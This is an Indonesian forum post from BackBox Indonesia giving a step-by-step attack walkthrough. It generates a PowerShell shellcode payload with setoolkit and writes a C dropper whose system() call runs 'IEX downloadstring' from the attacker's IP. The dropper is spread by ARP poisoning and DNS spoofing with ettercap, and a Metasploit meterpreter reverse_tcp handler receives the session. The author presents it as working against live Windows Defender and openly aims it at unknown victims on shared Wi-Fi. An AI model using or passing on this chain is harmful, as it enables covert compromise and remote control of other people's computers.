BackBox Indonesia
Attacking
Exploitation

PowerShell Attack Vector - Alphanumeric Shellcode Injector kawin DNS Spoofing

PowerShell Attack Vector - Alphanumeric Shellcode Injector kawin DNS Spoofing

by penjagalilin - 12-14-2016 at 06:55 PM

penjagalilin

Hydrus

Posts:

Joined:

Jun 2016

Likes:

Reputation:

2 Year Of Member

Posted: 12-14-2016, 06:55 PM (This post was last modified: 12-15-2016, 03:33 AM by penjagalilin.)

Warning!

Buat ente yang merasa pingin hek satelit ato ngehex CIA sorry bray, mending gausah diterusin bacanya, salah kamar bray. TS masi folos nubi tjoepoeh imut kyutt unyu tralala.

Bingung mo nulis apaan, jadi gini intinya aing pingin syeer salah satu anu yang masih anu melewati AV lawas yang gapernah update.

Keterangan :
1. IP Attacker : 192.168.56.1
2. IP Victim : gatau ane mah, bodoamat yang penting bisa obok obok.

MEMASAK PAYLOAD BUAT MAKAN MALEM :*

1. Jadi user root dulu biar afdol

Code:
$ sudo su

2. Buka setoolkit

Code:
# setoolkit

Kalo udah kebuka langsung aja pilih nomer 1 (Social Engineering Attacks) > Pilih nomer 9 (Powershell attack vector) > Pilih nomer 1 (Powershell Alphanumeric Shellcode Injector)
Kalo udah masukin IP & Port ente yang berperan sebagai attacker, kalo udah pilih no aja, Ctrl+C aja sampe setoolkit nutup dan balik ke terminal.

2. Secara otomatis setoolkit bakal generate sebuah payload dan bakalan disimpen di /root/.set/reports/powershell/ Jadi kita pindah aja ke direktori tsb dan liat isinya.

Code:
# cd /root/.set/reports/powershell/

Didalem nya akan ada sebuah file payload bernama x86_powershell_injection.txt

Udah gitu kita pindah itu file ke web directory.

Code:
# mv x86_powershell_injection.txt /var/www/html/pyld.txt

Oke ayok ikutan pindah dir ke sana juga.

Code:
# cd /var/www/html/

3. Sekarang ane ngoding sebuah source program pake bahasa C

Code:
# nano trap.c

Nih source nya :

Code:
#include <stdio.h>

#include <stdlib.h>

int main()

{

    system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://192.168.56.1/pyld.txt'))\"");

    return 0;

}

192.168.56.1 itu IP ente/attacker, jadi fungsi program ini ntar saat dijalanin si korban bakalan ngunduh dan ngeksekusi file payload kita. Jadi komputer kita ntar juga bakal jadi webserver bentar.

4. Compile source nya menjadi program (.exe)

Untuk melakukan cross-compilation pada linux kalian memerlukan MinGW

Baca disini cara install nya

Cara ngompile nya gini

Code:
# i686-w64-mingw32-gcc -o trap.exe trap.c

5. Compress file program nya jadi zip

Code:
# zip trap.zip trap.exe

6. Buat file index.html yang bisa redirect ke file trap.zip

Code:
# nano index.html

Code nya begini nih :

DNS SPOOFING

Opsional sih ini cara nebar nya gimana, yang penting korban kudu buka file trap.exe

*Kalau ente berada di isolated-network (misal : @wifi.id) gausah pake dns spoofing, dan upload file pyld.txt ke hosting pribadi atau apa yang penting bisa diliat korban, jadi sesuaiin juga IP dalam source program trap.exe

DNS Spoofing ini bakal berguna kalo ente ada di jaringan rumahan / warung wifi / pokoknya yang gak isolated-client (bisa arp poisoning / ping & scan hosts lain)

1. Edit konfigurasi ettercap

Code:
# nano /etc/ettercap/etter.dns

Cari kata microsof sucks, maka akan ketemu beberapa baris konfigurasi microsoft. Disable semua dengan menambahkan tanda pagar. Trus tambahin IP ente.

Ntar korban yang terspoof ketika ingin mengakses web apa saja bakalan dialihkan ke IP ente. Dan saat membuka index.html justru akan dialihkan untuk mendownload file trap.exe

2. Mulai DNS Spoofing

Code:
# ettercap -G

- Klik tab Sniff > Pilih Uniffied sniffing... > Pilih Network interface yang dipakai [eth0/eth1/wlan0/wlan1]

- Klik tab Hosts > Pilih Scan for hosts

- Klik tab Hosts > Pilih Hosts list > Masukkan IP Gateway ke Target 1 > Masukkan IP korban ke Target 2. Gatau IP nya? Masukin aja semua IP selain gateway ke Target 2.
Cara liat IP Gateway, buka terminal baru trus :

Code:
$ sudo route -n

- Klik tab Mitm > Pilih Arp poisoning... > Centang pada Sniff remote connections.

- Klik tab Plugins > Pilih Manage the plugins > Klik 2x pada dns_spoof supaya aktif

- Klik tab Start > Pilih Start sniffing

MENGAKTIFKAN WEB SERVER

Gini caranya, buka terminal baru dulu, trus :

Code:
$ sudo service apache2 start

LISTENING [b][u]METERPRETER DI METASPLOIT [/u][/b]

1. Buka METASPLOIT FRAMEWORK CONSOLE di terminal baru

Code:
$ sudo msfpayload

2. Setting Exploit, Listen Host & Port

Code:
> use exploit/multi/handler

> set PAYLOAD windows/meterpreter/reverse_tcp

> set LHOST 192.168.56.1

> set LPORT 69

> exploit

Masukkin IP ente dan Port sesuai yang di set di payload awal tadi.

Sekarang tunggu dengan sabar sampai ada yang kena..

TESTING DI WINDOWS 8

di Windows XP & 7 udah ane test dan WORK, sorry ini ane maksimal test Win8. Mau test Win 8.1/Win10 gakuat, maklum laptop buzux dipake VirtualBox

BUKTI WINDOWS DEFENDER & FIREWALL DALAM KEADAAN ON :

KORBAN :

- Saat korban mencoba mengakses web lain (misal : cinem*indo.stream) namun justru dialihkan ke alamat IP Attacker/Ane bray.

- Saat korban me-load index.html di web server ane, sama file index justru dialihkan ke http://192.168.56.1/trap.zip biar korban otomatis download (Kalo browser nya Chrome gitu, kalo lainnya ditanyain dulu).

- Abis di download, 70% korban mungkin secara tak sengaja membuka file trap.exe didalam nya.

- File trap.exe tereksekusi, maka akan mendownload otomatis (secara background) file pyld.txt dan mengeksekusinya.

- Crott deh.

Oke sekian post dari ane.. tak terasa udah hampir pagi. Kalo ada yang gamudeng monggo di komeng bray, tapi ane balesnya juga kalo sempet yo, dah ngantuk soalnyah

Bobo dolo ea beibz

{There's no God in My Code}

Message

Find Posts

Create an account

Create a free account today and start posting right away. It only takes a few seconds.

Log into an existing account.

View a Printable Version

1 Guest(s)

Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.